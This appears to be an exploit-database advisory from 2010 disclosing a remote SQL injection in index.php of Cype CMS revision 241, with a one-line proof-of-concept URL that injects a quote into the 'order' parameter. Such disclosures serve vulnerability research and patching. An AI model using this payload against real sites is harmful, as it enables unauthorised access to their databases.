id: 10561
date: 01/01/2010
title: Cype CMS SQL Injection Vulnerability
author: Sora
cves: 

====================================
Cype CMS SQL Injection Vulnerability
====================================

# Exploit Title: Cype Content Management System Remote SQL Injection Exploit
# Date: January 1st, 2010
# Author: Sora
# Version: Revision 241
# Tested on: Linux (Backtrack 3)
 
-----------------------------------------
 
> Cype CMS Remote SQL Injection Exploit
> Author: Sora
> Google Dork: In your dreams, script kiddies.
 
# Exploit Description:
Cype CMS suffers a remote SQL injection vulnerability in index.php.
 
# Code/Proof of Concept (PoC):
http://server/index.php?cype=main&page=ranking&order='&job=500



#  0day.today [2023-03-27]  #